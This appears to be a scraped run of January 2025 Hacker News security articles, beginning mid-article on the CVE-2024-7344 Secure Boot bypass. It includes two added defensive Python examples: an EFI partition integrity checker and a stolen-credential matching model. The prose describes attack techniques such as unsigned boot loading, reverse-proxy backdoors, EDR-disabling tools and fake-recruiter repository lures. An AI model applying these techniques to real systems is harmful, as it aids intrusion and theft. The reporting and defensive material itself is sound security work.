    "As a result, the application allows the loading of any UEFI binary, even an unsigned one, from a specially crafted file named cloak.dat, during system start, regardless of the UEFI Secure Boot state."

    An attacker who weaponizes CVE-2024-7344 could, therefore, sidestep UEFI Secure Boot protections and execute unsigned code during the boot process in the UEFI context, even before the operating system loads, granting them covert, persistent access to the host.

    "Code executed in this early boot phase can persist on the system, potentially loading malicious kernel extensions that survive both reboots and OS reinstallation," the CERT Coordination Center (CERT/CC) said. "Additionally, it may evade detection by OS-based and endpoint detection and response (EDR) security measures."

    Malicious actors could further expand the scope of exploitation by bringing their own copy of the vulnerable "reloader.efi" binary to any UEFI system with the Microsoft third-party UEFI certificate enrolled. However, elevated privileges are required to deploy the vulnerable and malicious files to the EFI system partition: local administrator on Windows and root on Linux.

    The Slovakian cybersecurity firm said it responsibly disclosed the findings to the CERT/CC in June 2024, following which Howyar Technologies and their partners addressed the issue in the concerned products.
    On January 14, 2025, Microsoft revoked the old, vulnerable binaries as part of its Patch Tuesday update.

    Outside of applying UEFI revocations, managing access to files located on the EFI system partition, Secure Boot customization, and remote attestation with a Trusted Platform Module (TPM) are some of the other ways of protecting against exploitation of unknown vulnerable signed UEFI bootloaders and deployment of UEFI bootkits.

    "The number of UEFI vulnerabilities discovered in recent years and the failures in patching them or revoking vulnerable binaries within a reasonable time window shows that even such an essential feature as UEFI Secure Boot should not be considered an impenetrable barrier," Smolár said.

    "However, what concerns us the most with respect to the vulnerability is not the time it took to fix and revoke the binary, which was quite good compared to similar cases, but the fact that this isn't the first time that such an obviously unsafe signed UEFI binary has been discovered. This raises questions of how common the use of such unsafe techniques is among third-party UEFI software vendors, and how many other similar obscure, but signed, bootloaders there might be out there."
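    One of the mitigations listed above is keeping an eye on what sits on the EFI system partition. The script below is an added example (not ESET's or Microsoft's tooling) of the simplest form of that: it takes a mount point for the ESP, builds a hash inventory of every file, flags the two file names ESET's description ties to this bug (reloader.efi, the signed loader, and cloak.dat, the container it loads), and diffs a later inventory against a saved baseline so any added, removed or modified file stands out. The mount path you pass is an assumption; the sample tree it builds in a temp directory is constructed for the example. A legitimate install of the affected recovery products will also carry reloader.efi, so a hit is a lead to check against the fixed versions and the January revocation, not proof of compromise.

```python
"""Inventory an EFI system partition and flag file names tied to CVE-2024-7344.

Added example, not ESET's or Microsoft's tooling. Assumes the ESP is mounted
at a path you pass in (for instance /boot/efi on Linux, or a drive letter you
assigned on Windows). The sample tree is constructed for demonstration.
"""
import hashlib
import os
import tempfile

# File names from ESET's description quoted in the article.
WATCHLIST = {"cloak.dat", "reloader.efi"}


def inventory_esp(root):
    """Return {relative_path: sha256} for every file under the ESP mount."""
    inv = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                inv[rel] = hashlib.sha256(fh.read()).hexdigest()
    return inv


def watchlist_hits(inventory):
    """Paths whose base name matches a watched name (case-insensitive)."""
    return sorted(p for p in inventory if os.path.basename(p).lower() in WATCHLIST)


def diff_inventory(baseline, current):
    """Compare two inventories; any change on the ESP deserves a look."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def add_sample_file(root, rel, data):
    """Write a constructed file at rel (forward-slash path) under root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def build_sample_esp():
    """Create a constructed ESP layout in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="esp-sample-")
    layout = {
        "EFI/Microsoft/Boot/bootmgfw.efi": b"MZ-sample-bootmgfw",
        "EFI/Boot/bootx64.efi": b"MZ-sample-bootx64",
        "EFI/recovery/reloader.efi": b"MZ-sample-reloader",
        "EFI/recovery/cloak.dat": b"sample-payload-container",
    }
    for rel, data in layout.items():
        add_sample_file(root, rel, data)
    return root


if __name__ == "__main__":
    esp = build_sample_esp()
    baseline = inventory_esp(esp)
    print("watchlist hits:", watchlist_hits(baseline))
    add_sample_file(esp, "EFI/Boot/extra.efi", b"MZ-unexpected")
    print("changes since baseline:", diff_inventory(baseline, inventory_esp(esp)))
```

    In practice the baseline would be taken right after provisioning and stored off the host, and the diff run from a scheduled job or your EDR's file-integrity feature; on Windows the script has to run elevated because the ESP is not mounted by default, which is the same privilege boundary the article notes an attacker needs to cross.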
  • The $10 Cyber Threat Responsible for the Biggest Breaches of 2024
    thehackernews.com
    Jan 16, 2025 | The Hacker News | Identity Protection / SaaS Security

    You can tell the story of the current state of stolen credential-based attacks in three numbers:

    - Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon)
    - Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user. (Source: Forrester)
    - Stolen credentials on criminal forums cost as little as $10. (Source: Verizon)

    Something doesn't add up. So, what's going on?

    In this article, we'll cover:

    - What's contributing to the huge rise in account compromises linked to stolen creds, and why existing approaches aren't working.
    - The world of murky intelligence on stolen credentials, and how to cut through the noise to find the true positives.
    - Recommendations for security teams to stop attackers from using stolen creds to achieve account takeover.

    Stolen credential-based attacks are on the rise

    There's clear evidence that identity attacks are now the #1 cyber threat facing organizations. The attacks on Snowflake customers in 2024 collectively constituted the biggest cyber security event of the year in terms of the number of organizations and individuals affected (at least, if you exclude CrowdStrike causing a worldwide outage in July); certainly, it was the largest perpetrated by a criminal group against commercial enterprises. It has been touted by some news outlets as "one of the biggest breaches ever."

    Around 165 organizations using Snowflake (a cloud-based data warehousing and analytics platform) were targeted using stolen credentials harvested from infostealer infections dating as far back as 2020. These affected accounts also lacked MFA, enabling attackers to log in with a single compromised factor.

    The impact was massive. In all, 9 victims have been named publicly following the breach, impacting hundreds of millions of people's sensitive data. At least one victim paid an undisclosed ransom fee.
    But this wasn't a one-off. These attacks were happening constantly throughout 2024. The huge Change Healthcare breach, which culminated in 100 million customers being impacted and a $22 million ransom demand, started with stolen Citrix credentials. Disney's Confluence servers and Slack instance were hacked, resulting in huge amounts of commercially sensitive data and IT infrastructure details being leaked, as well as messages from 10,000 Slack channels. Microsoft suffered a significant breach of their Office 365 environment, with sensitive emails leaked after a "test" OAuth application was compromised using stolen creds. Finastra, Schneider Electric, Nidec, Foundation, ADT, HealthEquity, Park'N Fly, Roku, LA County Health Services, and many more all suffered data breaches of varying severity as a result of stolen creds. Researchers are getting in on the action too. In October, Microsoft's ServiceNow tenant was hacked using stolen credentials acquired online, accessing thousands of support ticket descriptions and attachments, and 250k+ employee emails.

    Stolen credentials are still a problem? Really?

    Key to many of the attacks targeting workforce identities and online accounts is the use of stolen credentials. And unfortunately, an increased focus on MFA adoption hasn't quite solved the problem. MFA gaps remain rife. Research from Push Security shows that where a password is the sole login method for an account, these accounts lack MFA in 4 out of 5 cases.

    The number of breached credentials continues to grow at an alarming rate due to the prevalence of infostealer compromises. And data breaches tend to beget more data breaches as account information is leaked, creating a vicious cycle.

    The shift to third-party apps and services for most major business operations is leading to more accounts, more credentials, and more valuable business data in the cloud, all low-hanging targets for attackers.
    So, there are more targets for attackers, more credentials to use against them, and MFA (in particular phishing-resistant MFA) is nowhere near as present as we'd hope. Look at the breaches we mentioned earlier: many of the victims are huge companies, with vast security budgets. If they can't achieve complete coverage, then how can anyone be expected to?

    The rise of infostealers

    The rise of infostealer malware has had a significant impact on the increase in credential-based attacks. While infostealer malware isn't exactly new, it's a growing concern for many security organizations. Commercial Malware-as-a-Service offerings on the criminal underground are being continuously updated to evade detection controls, and the more sophisticated criminal and nation state-backed threat groups are proficient in creating custom malware. It's a cat-and-mouse game, and the sheer number of compromised credentials tracing back to infostealer infections is a testament to their success.

    Once stolen, credential data such as usernames, passwords, and session cookies makes its way to criminal forums on both the clearweb and the darkweb. Popular infostealers even have their own dedicated Telegram channels to advertise and sell stolen data.

    But the landscape in which they are deployed has evolved too. There's a greater appetite for stolen credentials among cyber criminals, and ultimately the more apps that companies use (typically 200+ for the average organization), the more accounts they have connected to them, and the more credentials there are to steal. And because infostealers target all credentials saved on the victim's device (not just those belonging to a single app/website, as with phishing campaigns), they're perfectly poised to smash and grab.

    Modern working arrangements open up the attack surface further.
    All it takes is for a user to log into their personal browser profile on a corporate device (or the inverse), and their personal device to be compromised, for corporate credentials to be stolen. And because infostealers are pushed through unorthodox channels compared to more traditional email-based attacks (like gaming forums, Facebook ads, and YouTube video descriptions), it's no surprise that unsuspecting victims are falling foul. And with password reuse incredibly common (10% of accounts have a breached, weak, or reused password and no MFA), stolen credentials from personal accounts can often be used to access corporate apps too. All it takes is an attacker with a little patience or the skill to automate SaaS credential stuffing at scale.

    The modern identity attack landscape has changed (a lot)

    In the past, security and IT teams were masters of their own Active Directory universe, making it possible to participate in password-cracking exercises or to compare threat intel lists to passwords in use by employees.

    That picture has changed. Security teams now face a tangle of managed and unmanaged SaaS as critical business operations have moved online. They lack visibility into identity posture on these apps, and the vast majority of organizations do not even have a plausible method for identifying all their accounts and apps in use across the business.

    SaaS attack paths leave little room for error

    Identity attacks are now fundamentally different. Unlike traditional network-based attacks, attacks that target online accounts follow a much more direct attack path. Traditional attacks progress by network access, lateral movement, privilege escalation, and other familiar activities. These kinds of attacks are well understood by security teams, and existing tooling can observe and detect these techniques.

    But account takeover requires an attacker only to compromise an account (the point of initial access), from where they can collect and exfiltrate data from the compromised app.
    The attack can be over very quickly, and traditional tooling offers little to prevent malicious activity in-app. Given the weak state of SaaS logging, it's likely that most app compromises won't even be visible to the security team. Even if data is available, detection and response becomes much more difficult after account takeover. There is limited log data available from SaaS to begin with, and distinguishing legitimate user activity from malicious activity is difficult. We saw with the Snowflake breaches that attackers simply logged in to user accounts using stolen credentials and then used a utility to perform account takeover and recon at scale, ending by using SQL commands to stage and exfiltrate data across multiple Snowflake customer tenants.

    Response activities are also constrained by circumstances: Do you have admin rights to the app? Does the app provide the kinds of response activities, such as forcing a session logout, that you need to perform? Each incident can feel like a one-off investigation, with peculiarities in each app to identify and work through, and few opportunities to automate security responses, limiting response teams to postmortem activities in which they find themselves unable to contain or reduce the scope of the breach.

    What about threat intelligence?

    Threat intelligence on stolen credentials is plentiful: many commercially available feeds can be acquired and ingested by security teams. However, the challenge is finding out where these creds are actually being used, and separating out the false positives. Researchers at Push Security recently evaluated threat intelligence data representing 5,763 username and password combinations that matched domains in use by Push customers. They found that fewer than 1% of the credentials in the multi-vendor dataset were true positives, meaning that the suspected stolen credentials were still in use by employees at those organizations.
    In other words, 99.5% of the stolen credentials they checked were false positives at the time of review.

    To deliver on the promise of threat intelligence in a meaningful way, security teams need a different approach. For a start, they need to be able to securely observe and match the passwords found in credential feeds with those being used. Most organizations fail to extract much value from compromised credential feeds. At most, you might be automating the process of requesting that users check their credentials for their primary SSO login (e.g. Okta, Entra, Google Workspace) when a credential breach notification comes through. But this workflow won't scale when you consider how often these breached credential lists are recycled; it all starts to get a bit spammy. After a while, users will start to complain and ignore these requests.

    How security teams can prevent account takeover from stolen credentials using browser telemetry

    Security teams need a modern approach to defending against account takeover by preventing stolen credentials from being used, and MFA gaps from being exploited.

    Push Security provides a browser-based ITDR platform that deploys a browser agent to employee browsers in order to stop identity attacks.
    Push uses a browser agent that is able to securely observe credentials at the time of login to any app, in addition to collecting rich browser telemetry and providing security controls designed to stop account takeovers before they occur.

    Push is also able to supply browser telemetry and an inventory of your entire identity attack surface of accounts and apps, as well as analyze the security posture of employee passwords, login methods, and MFA status to close off high-risk account vulnerabilities.

    Push recently released two capabilities geared toward helping security teams stop account takeovers caused by stolen credentials and MFA gaps.

    Correlate the credentials your employees use with those found in compromised credential feeds

    The Push browser agent is able to compare suspected stolen credentials supplied by TI feeds to creds actually in use by employees across your organization and then flag only the verified true positives.

    Push customers can consume TI from the sources supplied directly by the Push platform or use the Push REST API to submit their own email/password combos from existing TI tools.

    This method works regardless of the source of the data or its age. It also uncovers where a stolen credential on one app is also in use on several other apps. Here's how it works:

    - Push receives TI on stolen credentials from vendor feeds.
    - For each customer environment, Push checks for customer domains in the data set.
    - When suspected stolen creds for a customer environment are present, Push hashes and salts the passwords and then sends those fingerprints to the relevant browser agents for comparison.
    - For customer-supplied credential data, Push performs the same salting and hashing to create fingerprints it can use to compare to password fingerprints observed by the relevant browser agents.
    - If the stolen credential fingerprint matches a known credential fingerprint observed to be in use by the Push browser agent, the platform returns a validated true positive alert.

    You can receive alerts for this detection via webhook, messaging platform notification, or in the Push admin console. Check out the feature release video for more information.

    Get MFA visibility across all your apps and close the gaps

    Push can also help teams close MFA gaps. As users access apps with their corporate identities, Push analyzes their MFA registration status and methods, and also identifies which apps they're using and their login methods. Using in-browser controls, Push can guide users to register MFA across different apps.

    Imagine a scenario where you need to quickly investigate the business impact of a recently announced SaaS breach. Using Push, you can:

    - Immediately check whether the Push extension has observed employee usage of the breached app. You can also see how many accounts Push has seen on that app and how they are accessing it (SSO vs. other methods, such as local password login).
    - For those accounts on the breached app, you can quickly see whether they have MFA, and which methods are registered. To determine MFA status, the Push extension uses the user's existing active session on an app to query that account's MFA registration status using the app's own API, providing a trustworthy verification. You can also see whether the users' passwords have any security issues, such as a verified stolen credential, or a password that's weak or reused.
    - For accounts that lack MFA, you can then configure an enforcement control to prompt employees who lack MFA to set it up whenever they next use the app.
    - Then, use Push's webhooks to monitor for MFA registrations and password changes by querying browser telemetry supplied by the Push agent.

    By combining alerting for verified stolen credentials with the ability to find and increase MFA adoption even on unmanaged apps, Push offers security teams a formidable toolkit for stopping account takeover.

    Find out more

    If you want to learn more about identity attacks and how to stop them, check out Push Security; you can try out their browser-based agent for free.

    This article is a contributed piece from one of The Hacker News' partners.
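    The "Here's how it works" flow above (filter the feed to the customer's domains, salt and hash the feed entries, compare the resulting fingerprints with fingerprints the browser agent recorded at login, alert only on matches) is easy to misread as a plaintext comparison, so here it is as a small model. This is an added example, not Push Security's code: the fingerprint scheme (HMAC-SHA256 over the normalised email and password under a per-tenant secret) is an assumption chosen so that the platform never needs an employee's plaintext password and the agent never needs the feed's, and the feed rows, customer domain and logins are constructed samples. It also shows the cross-app reuse case the text mentions, where one stolen password turns out to be in use on several apps.

```python
"""Correlate a stolen-credential feed with credentials observed at login.

Added example modelling the flow described in the article; not Push Security's
code. The keyed-hash fingerprint scheme is an assumption; every feed row,
domain and login below is a constructed sample.
"""
import hashlib
import hmac
from collections import defaultdict

TENANT_SECRET = b"constructed-per-tenant-secret"   # assumption: one secret per customer
CUSTOMER_DOMAINS = {"example.com"}                 # constructed customer environment

# Constructed TI feed rows: (email, password) pairs as a vendor would supply them.
TI_FEED = [
    ("alice@example.com", "Summer2023!"),
    ("Bob@Example.com", "hunter2"),
    ("dave@other.test", "irrelevant"),
]

# Constructed logins the browser agent saw: (email, app, password typed at login).
# In this model the agent keeps only the fingerprint, never the password itself.
OBSERVED_LOGINS = [
    ("alice@example.com", "crm.saas-a.test", "Summer2023!"),
    ("alice@example.com", "wiki.saas-b.test", "Summer2023!"),
    ("bob@example.com", "crm.saas-a.test", "Tr0ub4dor&3-rotated"),
]


def fingerprint(email, password, secret=TENANT_SECRET):
    """Keyed hash of the normalised email plus password (assumed scheme)."""
    msg = email.strip().lower().encode() + b"\x00" + password.encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def in_scope(feed, domains):
    """Keep only feed rows whose email domain belongs to this customer."""
    return [(e, p) for e, p in feed if e.rsplit("@", 1)[-1].lower() in domains]


def feed_fingerprints(feed, domains, secret=TENANT_SECRET):
    """Fingerprints the platform would send down to the agents: {fp: email}."""
    return {fingerprint(e, p, secret): e.lower() for e, p in in_scope(feed, domains)}


def agent_observations(logins, secret=TENANT_SECRET):
    """What the agent retains per login: {fp: set of apps it was used on}."""
    seen = defaultdict(set)
    for email, app, password in logins:
        seen[fingerprint(email, password, secret)].add(app)
    return seen


def verified_true_positives(feed_fps, observed):
    """Alert only where a feed credential is still in use; list every app."""
    alerts = []
    for fp, email in feed_fps.items():
        if fp in observed:
            alerts.append({"email": email, "apps": sorted(observed[fp])})
    return sorted(alerts, key=lambda a: a["email"])


if __name__ == "__main__":
    fps = feed_fingerprints(TI_FEED, CUSTOMER_DOMAINS)
    for alert in verified_true_positives(fps, agent_observations(OBSERVED_LOGINS)):
        print(f"{alert['email']}: stolen password still in use on {', '.join(alert['apps'])}")
```

    On the constructed data only alice's entry is a true positive, and it surfaces both apps she reused the password on; bob's feed entry is stale because he has since rotated, and dave's row never reaches the agents because his domain is out of scope. That filtering is what turns a feed that is 99.5% noise into a short list worth acting on.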
  • Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action
    thehackernews.com
    Jan 16, 2025 - The Hacker News - Certificate Management / Compliance

    The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle.

    Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a solution that can handle the chaos, not add to it.

    Introducing DigiCert ONE: a revolutionary platform designed to simplify and automate your entire trust ecosystem.

    But seeing is believing, right? That's why we're hosting a free webinar to show you DigiCert ONE in action. In this can't-miss event, you'll discover:

    - Centralized Control, Simplified Operations: Tired of juggling certificate chaos? Discover how DigiCert ONE makes it easy to manage certificates for devices, users, and workloads, all in one place.
    - Automate and Secure Your Hybrid Environment: Complexity grows as your systems expand, but DigiCert ONE automates trust operations to keep everything running smoothly while reducing risk.
    - DevOps Meets Security: Don't let DevOps speed compromise security. Learn how to implement secure, automated software signing practices that integrate seamlessly into your workflows.
    - Stress-Free Compliance: Keep auditors happy with advanced reporting tools that ensure you meet even the toughest compliance requirements without breaking a sweat.

    Whether you're dealing with IoT security, enterprise IT, or fast-paced DevOps workflows, trust is at the heart of your digital operations. But managing trust doesn't have to be the headache it is today.

    The DigiCert ONE Webinar will show you how to take back control, scaling security with confidence while cutting down on complexity. Register for this now.

    Don't let outdated processes hold you back. This is your opportunity to gain clarity, learn from industry experts, and see how DigiCert ONE delivers trust like never before.

    This article is a contributed piece from one of our valued partners.
  • Researcher Uncovers Critical Flaws in Multiple Versions of Ivanti Endpoint Manager
    thehackernews.com
    Jan 16, 2025 - Ravie Lakshmanan - Vulnerability / Endpoint Security

    Ivanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure.

    All four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM and concern absolute path traversal flaws that allow a remote unauthenticated attacker to leak sensitive information. The flaws are listed below:

    - CVE-2024-10811
    - CVE-2024-13161
    - CVE-2024-13160
    - CVE-2024-13159

    The shortcomings affect EPM versions 2024 November security update and prior, and 2022 SU6 November security update and prior. They have been addressed in EPM 2024 January-2025 Security Update and EPM 2022 SU6 January-2025 Security Update.

    Horizon3.ai security researcher Zach Hanley has been credited with discovering and reporting all the vulnerabilities in question.

    Also patched by Ivanti are multiple high-severity bugs in Avalanche versions prior to 6.4.7 and Application Control Engine before version 10.14.4.0 that could permit an attacker to bypass authentication, leak sensitive information, and get around the application blocking functionality.

    The company said it has no evidence that any of the flaws are being exploited in the wild, and that it has intensified its internal scanning and testing procedures to promptly flag and address security issues.

    The development comes as SAP released fixes to resolve two critical vulnerabilities in its NetWeaver ABAP Server and ABAP Platform (CVE-2025-0070 and CVE-2025-0066, CVSS scores: 9.9) that allow an authenticated attacker to exploit improper authentication checks in order to escalate privileges and access restricted information due to weak access controls.

    "SAP strongly recommends that the customer visits the Support Portal and applies patches on priority to protect their SAP landscape," the company said in its January 2025 bulletin.
  • Python-Based Malware Powers RansomHub Ransomware to Exploit Network Flaws
    thehackernews.com
    Jan 16, 2025 - Ravie Lakshmanan - Endpoint Security / Ransomware

    Cybersecurity researchers have detailed an attack in which a threat actor utilized a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network.

    According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloader named SocGholish (aka FakeUpdates), which is known to be distributed via drive-by campaigns that trick unsuspecting users into downloading bogus web browser updates.

    Such attacks commonly involve the use of legitimate-but-infected websites that victims are redirected to from search engine results using black hat Search Engine Optimization (SEO) techniques. Upon execution, SocGholish establishes contact with an attacker-controlled server to retrieve secondary payloads.

    As recently as last year, SocGholish campaigns have targeted WordPress sites relying on outdated versions of popular SEO plugins such as Yoast (CVE-2024-4984, CVSS score: 6.4) and Rank Math PRO (CVE-2024-3665, CVSS score: 6.4) for initial access.

    In the incident investigated by GuidePoint Security, the Python backdoor was found to be dropped about 20 minutes after the initial infection via SocGholish. The threat actor then proceeded to deliver the backdoor to other machines located in the same network during lateral movement via RDP sessions.

    "Functionally, the script is a reverse proxy that connects to a hard-coded IP address. Once the script has passed the initial command-and-control (C2) handshake, it establishes a tunnel that is heavily based on the SOCKS5 protocol," security researcher Andrew Nelson said. "This tunnel allows the threat actor to move laterally in the compromised network using the victim system as a proxy."

    The Python script, an earlier version of which was documented by ReliaQuest in February 2024, has been detected in the wild since early December 2023, while undergoing "surface-level changes" that are aimed at improving the obfuscation methods used to avoid detection.

    GuidePoint also noted that the decoded script is both polished and well-written, indicating that the malware author is either meticulous about maintaining highly readable and testable Python code or is relying on artificial intelligence (AI) tools to assist with the coding task.

    "With the exception of local variable obfuscation, the code is broken down into distinct classes with highly descriptive method names and variables," Nelson added. "Each method also has a high degree of error handling and verbose debug messages."

    The Python-based backdoor is far from the only precursor detected in ransomware attacks. As highlighted by Halcyon earlier this month, some of the other tools deployed prior to ransomware deployment include those responsible for:

    - Disabling Endpoint Detection and Response (EDR) solutions using EDRSilencer and Backstab
    - Stealing credentials using LaZagne
    - Compromising email accounts by brute-forcing credentials using MailBruter
    - Maintaining stealthy access and delivering additional payloads using Sirefef and Mediyes

    Ransomware campaigns have also been observed targeting Amazon S3 buckets by leveraging Amazon Web Services' Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt victim data. The activity has been attributed to a threat actor dubbed Codefinger.

    Besides preventing recovery without their generated key, the attacks employ urgent ransom tactics wherein the files are marked for deletion within seven days via the S3 Object Lifecycle Management API to pressure victims into paying up.

    "Threat actor Codefinger abuses publicly disclosed AWS keys with permissions to write and read S3 objects," Halcyon said. "By utilizing AWS native services, they achieve encryption in a way that is both secure and unrecoverable without their cooperation."

    The development comes as SlashNext said it has witnessed a surge in "rapid-fire" phishing campaigns mimicking the Black Basta ransomware crew's email bombing technique to flood victims' inboxes with over 1,100 legitimate messages related to newsletters or payment notices.

    "Then, when people feel overwhelmed, the attackers swoop in via phone calls or Microsoft Teams messages, posing as company tech support with a simple fix," the company said. "They speak with confidence to gain trust, directing users to install remote-access software like TeamViewer or AnyDesk. Once that software is on a device, attackers slip in quietly. From there, they can spread harmful programs or sneak into other areas of the network, clearing a path straight to sensitive data."
  • The High-Stakes Disconnect For ICS/OT Security
    thehackernews.com
    Jan 15, 2025 - The Hacker News - ICS Security / Threat Detection

    Why does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn't just ineffective; it's high risk.

    In the rapidly evolving domain of cybersecurity, the specific challenges and needs of Industrial Control Systems (ICS) and Operational Technology (OT) security stand out distinctly from traditional IT security. ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies and controls. This is due to the increasing attacks against ICS/OT, their unique operational missions, a different risk surface than that of traditional IT networks, and the significant safety consequences of cyber incidents that impact the physical world.

    Critical infrastructure should be protected against today's threats to continue supporting national safety and economic stability. ICS/OT-specific controls and a dedicated cybersecurity strategy are an effective and responsible approach.

    The Rising Cyber Threats to ICS/OT Environments

    ICS technologies, crucial to modern infrastructure, are increasingly targeted in sophisticated cyber-attacks. These attacks, often aimed at causing irreversible physical damage to critical engineering assets, highlight the risks of interconnected and digitized systems. Recent incidents like TRISIS, CRASHOVERRIDE, Pipedream, and Fuxnet demonstrate the evolution of cyber threats from mere nuisances to potentially catastrophic events, orchestrated by state-sponsored groups and cybercriminals. These actors target not just financial gains but also disruptive outcomes and acts of warfare, blending cyber and physical attacks. Additionally, human-operated ransomware and targeted ICS/OT ransomware are a growing concern.

    When it comes to leveraging ICS/OT-specific controls to detect threats to our critical infrastructure, recent data from the 2024 SANS ICS/OT Cybersecurity Survey revealed that only 31% of respondents have a SOC (Security Operations Center) that includes capabilities specific to ICS/OT, which is crucial for effective incident response and ongoing system monitoring.

    As such, critical infrastructure, the engineering systems we rely on that make, move, and power our world, would do well to leverage ICS/OT-specific threat detection and visibility controls, backed by an ICS-specific budget, to protect the engineering systems that operate our modern way of life.

    Evaluating ICS/OT Cybersecurity Spending and Risk

    There may be a risky imbalance in security budget allocation in some ICS/OT organizations. It's understood, and rightfully so, that for the last few decades security funding was almost solely dedicated to IT technology and IT networks, due to traditional attacks using traditional vectors on traditional support systems. However, the threat landscape has changed due to interconnectivity. Now, IT networks and the Internet introduce significantly higher risks to connected ICS/OT environments than the risks ICS/OT and engineering environments faced a few decades ago.

    In fact, data from the 2024 SANS State of ICS/OT Cybersecurity Report indicates that 46% of attacks on ICS/OT environments are sourced from a compromise in IT support networks that allows threats into ICS/OT, impacting networks and operations. This is concerning given the complex nature of ICS threats and the severe multi-sector cascading impacts that may result from a coordinated engineering cyber-attack in a vital critical infrastructure sector, such as the electric sector. Furthermore, attacks on ICS/OT can have serious consequences for the environment and for the safety of people.

    Evaluating ICS/OT Cybersecurity Controls

    There may be a risky deployment of security controls in ICS/OT if they are IT-centric. Despite their critical role, many ICS/OT systems remain under-protected in several areas, such as security controls dedicated to ICS/OT environments and incident response. For example, research from the 2023 SANS ICS/OT Cybersecurity Report revealed that only 52% of these facilities have a dedicated, regularly exercised ICS/OT incident response plan that is engineering-driven.

    Traditional IT security measures, when applied to ICS/OT environments, can provide a false sense of security and disrupt engineering operations and safety. Thus, it is important to consider and prioritize the SANS Five ICS Cybersecurity Critical Controls. This freely available whitepaper sets forth the five most relevant critical controls for an ICS/OT cybersecurity strategy that can flex to an organization's risk model and provides guidance for implementing them.

    It is also important to note that using just one of the Five ICS Cybersecurity Critical Controls (ICS Network Visibility Monitoring, as an example) has benefits far beyond security alone. For example, mature organizations cite the main benefits of this control as directly contributing to safety and engineering across:

    - Safe, passive industrial traffic analysis to identify engineering assets to build an ICS/OT asset inventory
    - Engineering troubleshooting capabilities
    - Safe, passive industrial traffic analysis to identify engineering system vulnerabilities
    - Industrial and engineering-driven specific incident response capabilities
    - Meeting compliance requirements

    Strategic Realignment Opportunities

    It is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business: the engineering and operating technology systems. ICS/OT environments in many cases are not suited to traditional IT security controls, where those controls cause more problems than good.

    By aligning security expenditures with the critical functions that drive business in ICS organizations and critical infrastructure (namely, the operational technologies at Purdue Levels 1 to 3.5, to start), organizations and utilities can enhance security to operate more safely and efficiently in today's ICS/OT cyber threat landscape. Leadership and tactical analysts in ICS/OT critical infrastructure sector utilities can verify and/or implement the threat-driven, prioritized SANS Five ICS Cybersecurity Critical Controls.

    Tactical analysts can attend my course run of ICS515, a 6-day technical ICS/OT incident response and visibility training, this February at the SANS New Orleans event Powered by ICS Security. Join industry peers, SANS expert instructors, and practitioners for hands-on workshops and ICS/OT security training at the 20th Annual ICS Security Summit in Orlando this coming June 15-17.

    About the Author

    Dean Parsons is a renowned ICS/OT security expert with over 20 years of experience in the field. As a prominent figure at SANS, Dean has devoted his career to advancing the defense posture of critical infrastructure in all sectors, worldwide. Join Dean in class for ICS515 in New Orleans, Orlando, San Diego, or another convenient time in 2025 for tactical ICS/OT cybersecurity defense, and connect with him and other ICS/OT experts at this year's 20th Anniversary SANS ICS Summit in June 2025 in Orlando.

    This article is a contributed piece from one of our valued partners.
  • Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99
    thehackernews.com
    The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware.

    "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat Research and Intelligence at SecurityScorecard, said in a new report published today. "Once a victim takes the bait, they're directed to clone a malicious GitLab repository, seemingly harmless but packed with disaster. The cloned code connects to command-and-control (C2) servers, embedding malware into the victim's environment."

    Victims of the campaign have been identified across the globe, with a significant concentration recorded in Italy. A lesser number of impacted victims are located in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S.

    The cybersecurity company said the campaign, which it discovered on January 9, 2025, builds on job-themed tactics previously observed in Lazarus attacks, such as Operation Dream Job (aka NukeSped), to focus particularly on targeting developers in the Web3 and cryptocurrency fields.

    What makes Operation 99 unique is that it entices developers with coding projects as part of an elaborate recruitment scheme that involves crafting deceptive LinkedIn profiles, which are then used to direct them to rogue GitLab repositories. The end goal of the attacks is to deploy data-stealing implants that are capable of extracting source code, secrets, cryptocurrency wallet keys, and other sensitive data from development environments.

    These include Main5346 and its variant Main99, which serves as a downloader for three additional payloads:

    - Payload99/73 (and its functionally similar Payload5346), which collects system data (e.g., files and clipboard content), terminates web browser processes, executes arbitrary, and establishes a persistent connection to the C2 server
    - Brow99/73, which steals data from web browsers to facilitate credential theft
    - MCLIP, which monitors and exfiltrates keyboard and clipboard activity in real time

    "By compromising developer accounts, attackers not only exfiltrate intellectual property but also gain access to cryptocurrency wallets, enabling direct financial theft," the company said. "The targeted theft of private and secret keys could lead to millions in stolen digital assets, furthering the Lazarus Group's financial goals."

